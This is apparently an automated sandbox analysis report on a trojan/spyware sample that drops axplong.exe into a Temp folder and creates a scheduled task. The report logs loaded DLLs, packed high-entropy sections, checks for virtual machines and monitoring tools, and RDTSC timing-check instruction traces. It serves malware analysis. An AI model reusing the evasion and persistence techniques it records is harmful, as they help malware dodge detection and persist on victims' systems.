                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\axplong.jobJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00B24CF06_2_00B24CF0
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00B630686_2_00B63068
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00B2E4406_2_00B2E440
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00B57D836_2_00B57D83
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00B24AF06_2_00B24AF0
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00B6765B6_2_00B6765B
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00B62BD06_2_00B62BD0
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00B687206_2_00B68720
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00B66F096_2_00B66F09
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00B6777B6_2_00B6777B
                    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: file.exeStatic PE information: Section: ZLIB complexity 0.9973337448910081
                    Source: file.exeStatic PE information: Section: wygwfpzp ZLIB complexity 0.994612147990613
                    Source: axplong.exe.0.drStatic PE information: Section: ZLIB complexity 0.9973337448910081
                    Source: axplong.exe.0.drStatic PE information: Section: wygwfpzp ZLIB complexity 0.994612147990613
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/3@1/1
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeMutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\44111dbc49Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: file.exeReversingLabs: Detection: 52%
                    Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mstask.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: dui70.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: duser.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: chartv.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: oleacc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: atlthunk.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: explorerframe.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                    Source: file.exeStatic file information: File size 1949184 > 1048576
                    Source: file.exeStatic PE information: Raw size of wygwfpzp is bigger than: 0x100000 < 0x1aa200

                    Data Obfuscation

                    barindex
                    Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.ed0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wygwfpzp:EW;puucqgap:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wygwfpzp:EW;puucqgap:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 1.2.axplong.exe.b20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wygwfpzp:EW;puucqgap:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wygwfpzp:EW;puucqgap:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 2.2.axplong.exe.b20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wygwfpzp:EW;puucqgap:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wygwfpzp:EW;puucqgap:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 6.2.axplong.exe.b20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wygwfpzp:EW;puucqgap:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wygwfpzp:EW;puucqgap:EW;.taggant:EW;
                    Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                    Source: axplong.exe.0.drStatic PE information: real checksum: 0x1de863 should be: 0x1e1a8e
                    Source: file.exeStatic PE information: real checksum: 0x1de863 should be: 0x1e1a8e
                    Source: file.exeStatic PE information: section name:
                    Source: file.exeStatic PE information: section name: .idata
                    Source: file.exeStatic PE information: section name:
                    Source: file.exeStatic PE information: section name: wygwfpzp
                    Source: file.exeStatic PE information: section name: puucqgap
                    Source: file.exeStatic PE information: section name: .taggant
                    Source: axplong.exe.0.drStatic PE information: section name:
                    Source: axplong.exe.0.drStatic PE information: section name: .idata
                    Source: axplong.exe.0.drStatic PE information: section name:
                    Source: axplong.exe.0.drStatic PE information: section name: wygwfpzp
                    Source: axplong.exe.0.drStatic PE information: section name: puucqgap
                    Source: axplong.exe.0.drStatic PE information: section name: .taggant
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00B3D84C push ecx; ret 6_2_00B3D85F
                    Source: file.exeStatic PE information: section name: entropy: 7.984881564074441
                    Source: file.exeStatic PE information: section name: wygwfpzp entropy: 7.954236015998608
                    Source: axplong.exe.0.drStatic PE information: section name: entropy: 7.984881564074441
                    Source: axplong.exe.0.drStatic PE information: section name: wygwfpzp entropy: 7.954236015998608
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeJump to dropped file

                    Boot Survival

                    barindex
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonclassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonclassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\axplong.jobJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3F239 second address: F3F25C instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD648BC9AC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FD648BC9AD3h 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3EB58 second address: F3EB64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C46FA second address: 10C4722 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FD648BC9ACBh 0x00000008 jmp 00007FD648BC9AD5h 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C4722 second address: 10C472C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FD648C0B446h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C49CC second address: 10C49E5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FD648BC9AD3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C49E5 second address: 10C49EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C49EC second address: 10C49F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C7F5E second address: 10C7F87 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FD648C0B44Ch 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD648C0B454h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C7F87 second address: 10C7F92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FD648BC9AC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C7F92 second address: 10C802E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jp 00007FD648C0B45Fh 0x00000011 mov eax, dword ptr [eax] 0x00000013 push ecx 0x00000014 jmp 00007FD648C0B454h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e pushad 0x0000001f jns 00007FD648C0B44Ch 0x00000025 pushad 0x00000026 jmp 00007FD648C0B44Fh 0x0000002b jmp 00007FD648C0B458h 0x00000030 popad 0x00000031 popad 0x00000032 pop eax 0x00000033 mov ch, 69h 0x00000035 lea ebx, dword ptr [ebp+1245CD6Ch] 0x0000003b mov dword ptr [ebp+122D2EA8h], esi 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007FD648C0B44Bh 0x0000004b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C802E second address: 10C8038 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD648BC9AC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C809D second address: 10C8174 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FD648C0B44Eh 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov edx, dword ptr [ebp+122D3A4Ah] 0x00000014 push 00000000h 0x00000016 mov esi, dword ptr [ebp+122D39EAh] 0x0000001c push A2BBBAD3h 0x00000021 jmp 00007FD648C0B456h 0x00000026 add dword ptr [esp], 5D4445ADh 0x0000002d mov cx, bx 0x00000030 push 00000003h 0x00000032 je 00007FD648C0B44Ch 0x00000038 mov ecx, dword ptr [ebp+122D37F6h] 0x0000003e cld 0x0000003f push 00000000h 0x00000041 sub cl, 00000073h 0x00000044 mov dword ptr [ebp+12459A05h], edx 0x0000004a push 00000003h 0x0000004c call 00007FD648C0B449h 0x00000051 jmp 00007FD648C0B453h 0x00000056 push eax 0x00000057 pushad 0x00000058 push edx 0x00000059 push eax 0x0000005a pop eax 0x0000005b pop edx 0x0000005c jmp 00007FD648C0B44Ch 0x00000061 popad 0x00000062 mov eax, dword ptr [esp+04h] 0x00000066 jmp 00007FD648C0B457h 0x0000006b mov eax, dword ptr [eax] 0x0000006d jmp 00007FD648C0B455h 0x00000072 mov dword ptr [esp+04h], eax 0x00000076 push eax 0x00000077 push edx 0x00000078 pushad 0x00000079 je 00007FD648C0B446h 0x0000007f push ebx 0x00000080 pop ebx 0x00000081 popad 0x00000082 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C8174 second address: 10C81A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648BC9ACBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov edi, dword ptr [ebp+122D3A4Eh] 0x00000010 lea ebx, dword ptr [ebp+1245CD75h] 0x00000016 ja 00007FD648BC9ACBh 0x0000001c sub si, 3B91h 0x00000021 mov dword ptr [ebp+122D2CE3h], edi 0x00000027 push eax 0x00000028 push ecx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C81A7 second address: 10C81AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C8224 second address: 10C8228 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C8228 second address: 10C8266 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push eax 0x0000000a call 00007FD648C0B448h 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 add dword ptr [esp+04h], 0000001Ah 0x0000001c inc eax 0x0000001d push eax 0x0000001e ret 0x0000001f pop eax 0x00000020 ret 0x00000021 or dx, 6500h 0x00000026 push 00000000h 0x00000028 mov cx, ax 0x0000002b push 8C249227h 0x00000030 push eax 0x00000031 push edx 0x00000032 push edx 0x00000033 pushad 0x00000034 popad 0x00000035 pop edx 0x00000036 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C8266 second address: 10C826C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C826C second address: 10C8270 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C8270 second address: 10C8274 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C8274 second address: 10C82F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 73DB6E59h 0x0000000f mov edi, 56AD0B1Ah 0x00000014 push 00000003h 0x00000016 mov dword ptr [ebp+122D347Fh], ebx 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push eax 0x00000021 call 00007FD648C0B448h 0x00000026 pop eax 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b add dword ptr [esp+04h], 00000016h 0x00000033 inc eax 0x00000034 push eax 0x00000035 ret 0x00000036 pop eax 0x00000037 ret 0x00000038 mov ecx, edi 0x0000003a push 00000003h 0x0000003c push 00000000h 0x0000003e push esi 0x0000003f call 00007FD648C0B448h 0x00000044 pop esi 0x00000045 mov dword ptr [esp+04h], esi 0x00000049 add dword ptr [esp+04h], 00000016h 0x00000051 inc esi 0x00000052 push esi 0x00000053 ret 0x00000054 pop esi 0x00000055 ret 0x00000056 mov dword ptr [ebp+122D2986h], ebx 0x0000005c call 00007FD648C0B449h 0x00000061 pushad 0x00000062 push eax 0x00000063 push edx 0x00000064 jmp 00007FD648C0B451h 0x00000069 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C82F5 second address: 10C833A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648BC9ACAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FD648BC9AD5h 0x0000000e popad 0x0000000f push eax 0x00000010 push edi 0x00000011 jg 00007FD648BC9ACCh 0x00000017 pop edi 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c jbe 00007FD648BC9ADEh 0x00000022 push eax 0x00000023 push edx 0x00000024 ja 00007FD648BC9AC6h 0x0000002a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C833A second address: 10C8371 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648C0B44Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c pushad 0x0000000d jl 00007FD648C0B446h 0x00000013 jmp 00007FD648C0B458h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C8371 second address: 10C8375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C8375 second address: 10C838D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c push eax 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007FD648C0B446h 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C838D second address: 10C83CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 call 00007FD648BC9AD4h 0x0000000d pushad 0x0000000e push esi 0x0000000f pop edx 0x00000010 and ecx, dword ptr [ebp+122D38C6h] 0x00000016 popad 0x00000017 pop ecx 0x00000018 lea ebx, dword ptr [ebp+1245CD80h] 0x0000001e mov ecx, dword ptr [ebp+122D39BEh] 0x00000024 push eax 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FD648BC9ACBh 0x0000002d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C83CF second address: 10C83D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
